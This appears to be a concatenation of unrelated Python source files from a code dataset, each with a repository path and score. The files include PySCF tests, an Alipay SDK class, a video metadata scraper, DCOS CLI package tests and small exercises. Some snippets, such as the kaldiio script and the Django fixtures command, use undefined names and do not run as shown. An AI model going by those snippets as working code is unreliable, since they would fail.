self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit(), out=scf.GHF(mol), remove_df=True), df_jk._DFHF))
addons.convert_to_rhf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_uhf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.RHF(mol).x2c().density_fit())
addons.convert_to_rhf(scf.UHF(mol).x2c().density_fit())
addons.convert_to_uhf(scf.UHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.UHF(mol).x2c().density_fit())
#addons.convert_to_rhf(scf.GHF(mol).x2c().density_fit())
#addons.convert_to_uhf(scf.GHF(mol).x2c().density_fit())
addons.convert_to_ghf(scf.GHF(mol).x2c().density_fit())
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).x2c().newton().density_fit()), newton_ah._CIAH_SOSCF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.RHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_rhf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_uhf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.UHF(mol).newton().density_fit()), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_rhf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
#self.assertFalse(isinstance(addons.convert_to_uhf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertFalse(isinstance(addons.convert_to_ghf(scf.GHF(mol).newton().density_fit()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.RHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_rhf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_uhf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.UHF(mol).density_fit().newton()), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_rhf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
#self.assertTrue(isinstance(addons.convert_to_uhf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
self.assertTrue(isinstance(addons.convert_to_ghf(scf.GHF(mol).density_fit().newton()), df_jk._DFHF))
def test_get_ghf_orbspin(self):
orbspin = addons.get_ghf_orbspin(mf.mo_energy, mf.mo_occ)
self.assertEqual(list(orbspin), [0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1,0,1])
orbspin = addons.get_ghf_orbspin(mf_u.mo_energy, mf_u.mo_occ, is_rhf=False)
self.assertEqual(list(orbspin), [0,1,0,1,0,1,0,0,1,0,1,0,1,1,0,0,1,0,1,0,1,1,0,1,0,1])
def test_remove_lindep(self):
mol = gto.M(verbose = 0,
atom = [('H', 0, 0, i*.5) for i in range(4)],
basis = ('sto-3g',[[0, [.002,1]]]))
mf = addons.remove_linear_dep_(scf.RHF(mol), threshold=1e-8,
lindep=1e-9).run()
self.assertAlmostEqual(mf.e_tot, -1.6291001503057689, 7)
if __name__ == "__main__":
print("Full Tests for addons")
unittest.main()
| 1.757813
| 2
|
alipay/aop/api/domain/MiniAppFirstCategoryInfo.py
|
articuly/alipay-sdk-python-all
| 0
|
12783857
|
<reponame>articuly/alipay-sdk-python-all
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import simplejson as json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.MiniAppSecondCategoryInfo import MiniAppSecondCategoryInfo
class MiniAppFirstCategoryInfo(object):
def __init__(self):
self._category_id = None
self._category_name = None
self._child_category = None
@property
def category_id(self):
return self._category_id
@category_id.setter
def category_id(self, value):
self._category_id = value
@property
def category_name(self):
return self._category_name
@category_name.setter
def category_name(self, value):
self._category_name = value
@property
def child_category(self):
return self._child_category
@child_category.setter
def child_category(self, value):
if isinstance(value, list):
self._child_category = list()
for i in value:
if isinstance(i, MiniAppSecondCategoryInfo):
self._child_category.append(i)
else:
self._child_category.append(MiniAppSecondCategoryInfo.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.category_id:
if hasattr(self.category_id, 'to_alipay_dict'):
params['category_id'] = self.category_id.to_alipay_dict()
else:
params['category_id'] = self.category_id
if self.category_name:
if hasattr(self.category_name, 'to_alipay_dict'):
params['category_name'] = self.category_name.to_alipay_dict()
else:
params['category_name'] = self.category_name
if self.child_category:
if isinstance(self.child_category, list):
for i in range(0, len(self.child_category)):
element = self.child_category[i]
if hasattr(element, 'to_alipay_dict'):
self.child_category[i] = element.to_alipay_dict()
if hasattr(self.child_category, 'to_alipay_dict'):
params['child_category'] = self.child_category.to_alipay_dict()
else:
params['child_category'] = self.child_category
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = MiniAppFirstCategoryInfo()
if 'category_id' in d:
o.category_id = d['category_id']
if 'category_name' in d:
o.category_name = d['category_name']
if 'child_category' in d:
o.child_category = d['child_category']
return o
| 1.992188
| 2
|
bin/get_from_ustream.py
|
cleiver/codeandtalk.com
| 60
|
12783858
|
#!/usr/bin/env python3
import argparse
import json
import os
from pyquery import PyQuery
import re
import requests
# given a URL such as http://www.ustream.tv/recorded/102894434
# fetch the details of the presentation
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-u', '--url', help='URL of the video: http://www.ustream.tv/recorded/102894434', required=True)
parser.add_argument('-d', '--date', help='date in YYYY-MM-DD format', required=True)
parser.add_argument('-e', '--event', help='date in YYYY-MM-DD format', required=True)
args = parser.parse_args()
#print(args.url)
#print(args.date)
#print(args.event)
response = requests.get(args.url)
if response.status_code != 200:
print("Failed to fetch {}".format(args.url))
return
m = re.search(r'\d+$', args.url)
video_code = m.group(0)
#print(video_code)
event_dir = 'data/videos/{}'.format(args.event)
#print(event_dir)
if not os.path.exists(event_dir):
os.mkdir(event_dir)
html = PyQuery(response.content)
# speaker - title
# <meta property="og:title" content="<NAME> - Tech Lead Skills for Developers" />
speaker_title = html('meta[@property="og:title"]')[0].attrib['content']
speaker, title = speaker_title.split(' - ', 2)
# print(speaker)
# print(title)
#re.sub(r'', '-', title.lower())
speaker_nickname = re.sub(r' +', '-', speaker.lower())
print(speaker_nickname)
speaker_file = "data/people/{}.txt".format(speaker_nickname)
if not os.path.exists(speaker_file):
with open(speaker_file, 'w') as fh:
fh.write("name: {}\n".format(speaker))
event_file = "{}/{}.json".format(event_dir, video_code)
print(event_file)
data = {
"description" : html('meta[<EMAIL>"]')[0].attrib['content'],
"favorite": "0",
"length": "",
"likes": "0",
"recorded": args.date,
"speakers": [
speaker_nickname
],
"tags": [],
# <meta property="og:image" content="http://static-cdn1.ustream.tv/i/video/picture/0/1/102/102894/102894434/1_17590738_102894434,640x360,b,1:2.jpg" />
"thumbnail_url": html('meta[<EMAIL>="og:<EMAIL>"]')[0].attrib['content'],
"title": title,
"videos": [
{
"code": video_code,
"type": "ustream"
}
],
"views": "0"
}
#import code
#video_code.interact(local=locals())
#m = html('meta["property="og:description"]')
#print(m.html)
if os.path.exists(event_file):
print("File {} already exists.".format(event_file))
return
with open(event_file, 'w') as fh:
json.dump(data, fh, sort_keys=True, indent=4, separators=(',', ': '))
print("length is missing! Add it manually!")
main()
# vim: expandtab
| 3.03125
| 3
|
examples/validation/core/04_update_template.py
|
Kitware/trame
| 42
|
12783859
|
<gh_stars>10-100
from trame.app import get_server
from trame.widgets import html, trame
from trame.ui.html import DivLayout
LINE_COUNT = 1
# -----------------------------------------------------------------------------
# Trame setup
# -----------------------------------------------------------------------------
server = get_server()
layout = DivLayout(server)
def add_new_line():
global LINE_COUNT
with layout as c:
c.root.add_child(f"<br>New line {LINE_COUNT}")
LINE_COUNT += 1
with layout:
html.Button("Add a new line ({{ tts }})", click=add_new_line)
trame.LifeCycleMonitor(type="error", events=("['created']",))
# -----------------------------------------------------------------------------
# start server
# -----------------------------------------------------------------------------
if __name__ == "__main__":
server.start()
| 2.671875
| 3
|
egs/vwm/tts1/loadXvector.py
|
mapledxf/espnet
| 0
|
12783860
|
#!/usr/bin/env python
# coding=utf-8
import kaldiio
x=kaldiio.load_mat("/home/zlj/dxf/espnet/egs/vwm/tts1/decode/tts/xvectors/xvector.1.ark:4")
spemb = torch.FloatTensor(x).to(device)
print(str(x))
| 2.421875
| 2
|
core/src/main/python/wlsdeploy/aliases/__init__.py
|
CarolynRountree/weblogic-deploy-tooling
| 0
|
12783861
|
"""
Copyright (c) 2017, 2018, Oracle and/or its affiliates. All rights reserved.
The Universal Permissive License (UPL), Version 1.0
This package provides the WLST knowledge base used by the rest of the code to understand how to perform
their work across WebLogic versions and WLST modes.
"""
| 0.800781
| 1
|
armulator/armv6/memory_types.py
|
matan1008/armulator
| 16
|
12783862
|
from abc import ABCMeta, abstractmethod
class MemoryType(object):
__metaclass__ = ABCMeta
@abstractmethod
def __init__(self, size):
self.size = size
def __getitem__(self, (address, size)):
return self.read(address, size)
def __setitem__(self, address_size, value):
self.write(address_size[0], address_size[1], value)
@abstractmethod
def read(self, address, size):
pass
@abstractmethod
def write(self, address, size, value):
pass
class RAM(MemoryType):
def __init__(self, size):
super(RAM, self).__init__(size)
self.memory_array = bytearray(size)
def read(self, address, size):
chunk = self.memory_array[address:address + size]
return chunk
def write(self, address, size, value):
self.memory_array[address:address + size] = value
MEMORY_TYPE_DICT = {
"RAM": RAM
}
| 3.59375
| 4
|
combiner/management/commands/fixtures.py
|
storrellas/idrink
| 0
|
12783863
|
<filename>combiner/management/commands/fixtures.py
from django.core.management.base import BaseCommand, CommandError
from combiner.models import Ingredient, Drink
class Command(BaseCommand):
help = 'Closes the specified poll for voting'
# def add_arguments(self, parser):
# parser.add_argument('poll_id', nargs='+', type=int)
def handle(self, *args, **options):
# Generate entities
try:
beefeater = IngredientMongo(name='beefeater', description='this is description for beefeater').save()
dry_vermouth = IngredientMongo(name='dry_vermouth', description='this is description for dry_vermouth').save()
orange = IngredientMongo(name='orange', description='this is description for dry_vermouth').save()
drink = DrinkMongo( name="martini", description="this is a cool drink used among modernets", ingredient_list=[beefeater, dry_vermouth, orange]).save()
except:
raise CommandError('Failed to create entities')
self.stdout.write(self.style.SUCCESS('Successfully created entities for drink'))
| 2.328125
| 2
|
week_3/mapReduce_tasks/problem4.py
|
FireAndBlood12/db-coursera
| 0
|
12783864
|
import MapReduce
import sys
"""
Word Count Example in the Simple Python MapReduce Framework
"""
mr = MapReduce.MapReduce()
# =============================
# Do not modify above this line
def mapper(record):
# key: document identifier
# value: document contents
key = record[0]
friend = record[1]
#emit main relationship
mr.emit_intermediate(key, record);
#emit friend relationship to check non-sym
mr.emit_intermediate(friend, record);
def reducer(key, list_of_values):
# key: word
# value: book
for v in list_of_values:
nonRel=[v[1],v[0]]
if nonRel not in list_of_values:
if v[0] == key:
mr.emit((v[0],v[1]))
else:
mr.emit((v[1],v[0]))
# Do not modify below this line
# =============================
if __name__ == '__main__':
inputdata = open(sys.argv[1])
mr.execute(inputdata, mapper, reducer)
| 3.703125
| 4
|
cli/tests/integrations/test_package.py
|
ConnectionMaster/dcos-cli
| 1
|
12783865
|
<reponame>ConnectionMaster/dcos-cli
import contextlib
import json
import os
import pkg_resources
import six
from dcos import package, subcommand
from dcos.errors import DCOSException
import pytest
from mock import patch
from .common import (assert_command, assert_lines, delete_zk_nodes,
exec_command, file_bytes, file_json, get_services,
service_shutdown, wait_for_service, watch_all_deployments)
@pytest.fixture(scope="module")
def zk_znode(request):
request.addfinalizer(delete_zk_nodes)
return request
def _chronos_description(app_ids):
"""
:param app_ids: a list of application id
:type app_ids: [str]
:returns: a binary string representing the chronos description
:rtype: str
"""
result = [
{"apps": app_ids,
"description": "A fault tolerant job scheduler for Mesos which "
"handles dependencies and ISO8601 based schedules.",
"framework": True,
"images": {
"icon-large": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-large.png",
"icon-medium": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-medium.png",
"icon-small": "https://downloads.mesosphere.io/chronos/assets/"
"icon-service-chronos-small.png"
},
"licenses": [
{
"name": "Apache License Version 2.0",
"url": "https://github.com/mesos/chronos/blob/master/LICENSE"
}
],
"maintainer": "<EMAIL>",
"name": "chronos",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "Chronos DCOS Service has been successfully "
"installed!\n\n\tDocumentation: http://mesos."
"github.io/chronos\n\tIssues: https://github.com/"
"mesos/chronos/issues",
"postUninstallNotes": "The Chronos DCOS Service has been uninstalled "
"and will no longer run.\nPlease follow the "
"instructions at http://docs.mesosphere."
"com/services/chronos/#uninstall to clean up "
"any persisted state",
"preInstallNotes": "We recommend a minimum of one node with at least "
"1 CPU and 2GB of RAM available for the Chronos "
"Service.",
"releaseVersion": "1",
"scm": "https://github.com/mesos/chronos.git",
"tags": [
"cron",
"analytics",
"batch"
],
"version": "2.4.0"
}]
return (json.dumps(result, sort_keys=True, indent=2).replace(' \n', '\n') +
'\n').encode('utf-8')
def test_package():
stdout = pkg_resources.resource_string(
'tests',
'data/help/package.txt')
assert_command(['dcos', 'package', '--help'],
stdout=stdout)
def test_info():
assert_command(['dcos', 'package', '--info'],
stdout=b'Install and manage DCOS packages\n')
def test_version():
assert_command(['dcos', 'package', '--version'],
stdout=b'dcos-package version SNAPSHOT\n')
def test_sources_list():
stdout = b"fd40db7f075490e0c92ec6fcd62ec1caa361b313 " + \
b"https://github.com/mesosphere/universe/archive/cli-test-3.zip\n"
assert_command(['dcos', 'package', 'sources'],
stdout=stdout)
def test_update_without_validation():
returncode, stdout, stderr = exec_command(['dcos', 'package', 'update'])
assert returncode == 0
assert b'source' in stdout
assert b'Validating package definitions...' not in stdout
assert b'OK' not in stdout
assert stderr == b''
def test_update_with_validation():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'update', '--validate'])
assert returncode == 0
assert b'source' in stdout
assert b'Validating package definitions...' in stdout
assert b'OK' in stdout
assert stderr == b''
def test_describe_nonexistent():
assert_command(['dcos', 'package', 'describe', 'xyzzy'],
stderr=b'Package [xyzzy] not found\n',
returncode=1)
def test_describe_nonexistent_version():
stderr = b'Version a.b.c of package [marathon] is not available\n'
assert_command(['dcos', 'package', 'describe', 'marathon',
'--package-version=a.b.c'],
stderr=stderr,
returncode=1)
def test_describe():
stdout = file_json(
'tests/data/package/json/test_describe_marathon.json')
assert_command(['dcos', 'package', 'describe', 'marathon'],
stdout=stdout)
def test_describe_cli():
stdout = file_json(
'tests/data/package/json/test_describe_cli_cassandra.json')
assert_command(['dcos', 'package', 'describe', 'cassandra', '--cli'],
stdout=stdout)
def test_describe_app():
stdout = file_bytes(
'tests/data/package/json/test_describe_app_marathon.json')
assert_command(['dcos', 'package', 'describe', 'marathon', '--app'],
stdout=stdout)
def test_describe_config():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_config.json')
assert_command(['dcos', 'package', 'describe', 'marathon', '--config'],
stdout=stdout)
def test_describe_render():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_app_render.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--app', '--render'],
stdout=stdout)
def test_describe_package_version():
stdout = file_json(
'tests/data/package/json/test_describe_marathon_package_version.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-version=0.8.1'],
stdout=stdout)
def test_describe_package_version_missing():
stderr = b'Version bogus of package [marathon] is not available\n'
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-version=bogus'],
returncode=1,
stderr=stderr)
def test_describe_package_versions():
stdout = file_bytes(
'tests/data/package/json/test_describe_marathon_package_versions.json')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-versions'],
stdout=stdout)
def test_describe_package_versions_others():
stderr = (b'If --package-versions is provided, no other option can be '
b'provided\n')
assert_command(
['dcos', 'package', 'describe', 'marathon', '--package-versions',
'--app'],
returncode=1,
stderr=stderr)
def test_describe_options():
stdout = file_json(
'tests/data/package/json/test_describe_app_options.json')
assert_command(['dcos', 'package', 'describe', '--app', '--options',
'tests/data/package/marathon.json', 'marathon'],
stdout=stdout)
def test_describe_app_cli():
stdout = file_bytes(
'tests/data/package/json/test_describe_app_cli.json')
assert_command(
['dcos', 'package', 'describe', 'cassandra', '--app', '--cli'],
stdout=stdout)
def test_describe_specific_version():
stdout = file_bytes(
'tests/data/package/json/test_describe_marathon_0.8.1.json')
assert_command(['dcos', 'package', 'describe', '--package-version=0.8.1',
'marathon'],
stdout=stdout)
def test_bad_install():
args = ['--options=tests/data/package/chronos-bad.json', '--yes']
stderr = b"""Error: False is not of type 'string'
Path: chronos.zk-hosts
Value: false
Please create a JSON file with the appropriate options, and pass the \
/path/to/file as an --options argument.
"""
_install_chronos(args=args,
returncode=1,
stdout=b'',
stderr=stderr,
postInstallNotes=b'')
def test_install(zk_znode):
_install_chronos()
watch_all_deployments()
wait_for_service('chronos')
_uninstall_chronos()
watch_all_deployments()
services = get_services(args=['--inactive'])
assert len([service for service in services
if service['name'] == 'chronos']) == 0
def test_install_missing_options_file():
"""Test that a missing options file results in the expected stderr
message."""
assert_command(
['dcos', 'package', 'install', 'chronos', '--yes',
'--options=asdf.json'],
returncode=1,
stderr=b"Error opening file [asdf.json]: No such file or directory\n")
def test_install_specific_version():
stdout = (b'We recommend a minimum of one node with at least 2 '
b'CPU\'s and 1GB of RAM available for the Marathon Service.\n'
b'Installing Marathon app for package [marathon] '
b'version [0.8.1]\n'
b'Marathon DCOS Service has been successfully installed!\n\n'
b'\tDocumentation: https://mesosphere.github.io/marathon\n'
b'\tIssues: https:/github.com/mesosphere/marathon/issues\n\n')
uninstall_stderr = (
b'Uninstalled package [marathon] version [0.8.1]\n'
b'The Marathon DCOS Service has been uninstalled and will no longer '
b'run.\nPlease follow the instructions at http://docs.mesosphere.com/'
b'services/marathon/#uninstall to clean up any persisted state\n'
)
with _package('marathon',
stdout=stdout,
uninstall_stderr=uninstall_stderr,
args=['--yes', '--package-version=0.8.1']):
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'list', 'marathon', '--json'])
assert returncode == 0
assert stderr == b''
assert json.loads(stdout.decode('utf-8'))[0]['version'] == "0.8.1"
def test_install_bad_package_version():
stderr = b'Version a.b.c of package [cassandra] is not available\n'
assert_command(
['dcos', 'package', 'install', 'cassandra',
'--package-version=a.b.c'],
returncode=1,
stderr=stderr)
def test_package_metadata():
_install_helloworld()
# test marathon labels
expected_metadata = b"""<KEY>=="""
expected_command = b"""<KEY>""
expected_source = b"""https://github.com/mesosphere/universe/archive/\
cli-test-3.zip"""
expected_labels = {
'DCOS_PACKAGE_METADATA': expected_metadata,
'DCOS_PACKAGE_COMMAND': expected_command,
'DCOS_PACKAGE_REGISTRY_VERSION': b'2.0.0-rc1',
'DCOS_PACKAGE_NAME': b'helloworld',
'DCOS_PACKAGE_VERSION': b'0.1.0',
'DCOS_PACKAGE_SOURCE': expected_source,
'DCOS_PACKAGE_RELEASE': b'0',
}
app_labels = _get_app_labels('helloworld')
for label, value in expected_labels.items():
assert value == six.b(app_labels.get(label))
# test local package.json
package = {
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"tags": ["mesosphere", "example", "subcommand"],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld",
}
package_dir = subcommand.package_dir('helloworld')
# test local package.json
package_path = os.path.join(package_dir, 'package.json')
with open(package_path) as f:
assert json.load(f) == package
# test local source
source_path = os.path.join(package_dir, 'source')
with open(source_path) as f:
assert six.b(f.read()) == expected_source
# test local version
version_path = os.path.join(package_dir, 'version')
with open(version_path) as f:
assert six.b(f.read()) == b'0'
# uninstall helloworld
_uninstall_helloworld()
def test_install_with_id(zk_znode):
args = ['--app-id=chronos-1', '--yes']
stdout = (b'Installing Marathon app for package [chronos] version [2.4.0] '
b'with app id [chronos-1]\n')
_install_chronos(args=args, stdout=stdout)
args = ['--app-id=chronos-2', '--yes']
stdout = (b'Installing Marathon app for package [chronos] version [2.4.0] '
b'with app id [chronos-2]\n')
_install_chronos(args=args, stdout=stdout)
def test_install_missing_package():
stderr = b"""Package [missing-package] not found
You may need to run 'dcos package update' to update your repositories
"""
assert_command(['dcos', 'package', 'install', 'missing-package'],
returncode=1,
stderr=stderr)
def test_uninstall_with_id(zk_znode):
_uninstall_chronos(args=['--app-id=chronos-1'])
def test_uninstall_all(zk_znode):
_uninstall_chronos(args=['--all'])
get_services(expected_count=1, args=['--inactive'])
def test_uninstall_missing():
stderr = 'Package [chronos] is not installed.\n'
_uninstall_chronos(returncode=1, stderr=stderr)
stderr = 'Package [chronos] with id [chronos-1] is not installed.\n'
_uninstall_chronos(
args=['--app-id=chronos-1'],
returncode=1,
stderr=stderr)
def test_uninstall_subcommand():
_install_helloworld()
_uninstall_helloworld()
_list()
def test_uninstall_cli():
_install_helloworld()
_uninstall_helloworld(args=['--cli'])
stdout = b"""[
{
"apps": [
"/helloworld"
],
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
def test_uninstall_multiple_apps():
stdout = (b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0] with app id [/helloworld-1]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_install_helloworld(['--yes', '--app-id=/helloworld-1'],
stdout=stdout)
stdout = (b'A sample pre-installation message\n'
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0] with app id [/helloworld-2]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_install_helloworld(['--yes', '--app-id=/helloworld-2'],
stdout=stdout)
stderr = (b"Multiple apps named [helloworld] are installed: "
b"[/helloworld-1, /helloworld-2].\n"
b"Please use --app-id to specify the ID of the app "
b"to uninstall, or use --all to uninstall all apps.\n")
_uninstall_helloworld(stderr=stderr,
returncode=1)
assert_command(['dcos', 'package', 'uninstall', 'helloworld', '--all'])
watch_all_deployments()
def test_list(zk_znode):
_list()
_list(args=['xyzzy', '--json'])
_list(args=['--app-id=/xyzzy', '--json'])
_install_chronos()
expected_output = _chronos_description(['/chronos'])
_list(stdout=expected_output)
_list(args=['--json', 'chronos'],
stdout=expected_output)
_list(args=['--json', '--app-id=/chronos'],
stdout=expected_output)
_list(args=['--json', 'ceci-nest-pas-une-package'])
_list(args=['--json', '--app-id=/ceci-nest-pas-une-package'])
_uninstall_chronos()
def test_list_table():
with _helloworld():
assert_lines(['dcos', 'package', 'list'], 2)
def test_install_yes():
with open('tests/data/package/assume_yes.txt') as yes_file:
_install_helloworld(
args=[],
stdin=yes_file,
stdout=b'A sample pre-installation message\n'
b'Continue installing? [yes/no] '
b'Installing Marathon app for package [helloworld] version '
b'[0.1.0]\n'
b'Installing CLI subcommand for package [helloworld] '
b'version [0.1.0]\n'
b'New command available: dcos helloworld\n'
b'A sample post-installation message\n')
_uninstall_helloworld()
def test_install_no():
with open('tests/data/package/assume_no.txt') as no_file:
_install_helloworld(
args=[],
stdin=no_file,
stdout=b'A sample pre-installation message\n'
b'Continue installing? [yes/no] Exiting installation.\n')
def test_list_cli():
_install_helloworld()
stdout = b"""\
[
{
"apps": [
"/helloworld"
],
"command": {
"name": "helloworld"
},
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
stdout = (b"A sample pre-installation message\n"
b"Installing CLI subcommand for package [helloworld] " +
b"version [0.1.0]\n"
b"New command available: dcos helloworld\n"
b"A sample post-installation message\n")
_install_helloworld(args=['--cli', '--yes'], stdout=stdout)
stdout = b"""\
[
{
"command": {
"name": "helloworld"
},
"description": "Example DCOS application package",
"maintainer": "<EMAIL>",
"name": "helloworld",
"packageSource": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip",
"postInstallNotes": "A sample post-installation message",
"preInstallNotes": "A sample pre-installation message",
"releaseVersion": "0",
"tags": [
"mesosphere",
"example",
"subcommand"
],
"version": "0.1.0",
"website": "https://github.com/mesosphere/dcos-helloworld"
}
]
"""
_list(stdout=stdout)
_uninstall_helloworld()
def test_uninstall_multiple_frameworknames(zk_znode):
_install_chronos(
args=['--yes', '--options=tests/data/package/chronos-1.json'])
_install_chronos(
args=['--yes', '--options=tests/data/package/chronos-2.json'])
watch_all_deployments()
expected_output = _chronos_description(
['/chronos-user-1', '/chronos-user-2'])
_list(stdout=expected_output)
_list(args=['--json', 'chronos'], stdout=expected_output)
_list(args=['--json', '--app-id=/chronos-user-1'],
stdout=_chronos_description(['/chronos-user-1']))
_list(args=['--json', '--app-id=/chronos-user-2'],
stdout=_chronos_description(['/chronos-user-2']))
_uninstall_chronos(
args=['--app-id=chronos-user-1'],
returncode=1,
stderr='Uninstalled package [chronos] version [2.4.0]\n'
'The Chronos DCOS Service has been uninstalled and will no '
'longer run.\nPlease follow the instructions at http://docs.'
'mesosphere.com/services/chronos/#uninstall to clean up any '
'persisted state\n'
'Unable to shutdown the framework for [chronos-user] because '
'there are multiple frameworks with the same name: ')
_uninstall_chronos(
args=['--app-id=chronos-user-2'],
returncode=1,
stderr='Uninstalled package [chronos] version [2.4.0]\n'
'The Chronos DCOS Service has been uninstalled and will no '
'longer run.\nPlease follow the instructions at http://docs.'
'mesosphere.com/services/chronos/#uninstall to clean up any '
'persisted state\n'
'Unable to shutdown the framework for [chronos-user] because '
'there are multiple frameworks with the same name: ')
for framework in get_services(args=['--inactive']):
if framework['name'] == 'chronos-user':
service_shutdown(framework['id'])
def test_search():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'cron', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'xyzzy', '--json'])
assert returncode == 0
assert b'"packages": []' in stdout
assert b'"source": "https://github.com/mesosphere/universe/archive/\
cli-test-3.zip"' in stdout
assert stderr == b''
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'xyzzy'])
assert returncode == 1
assert b'' == stdout
assert stderr == b'No packages found.\n'
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', '--json'])
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
# assert the number of packages is gte the number at the time
# this test was written
assert len(registry['packages']) >= 5
assert returncode == 0
assert stderr == b''
def test_search_table():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search'])
assert returncode == 0
assert b'chronos' in stdout
assert len(stdout.decode('utf-8').split('\n')) > 5
assert stderr == b''
def test_search_ends_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'c*', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert b'cassandra' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
assert len(registry['packages']) == 2
def test_search_start_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', '*nos', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
assert len(registry['packages']) == 1
def test_search_middle_with_wildcard():
returncode, stdout, stderr = exec_command(
['dcos', 'package', 'search', 'c*s', '--json'])
assert returncode == 0
assert b'chronos' in stdout
assert stderr == b''
registries = json.loads(stdout.decode('utf-8'))
for registry in registries:
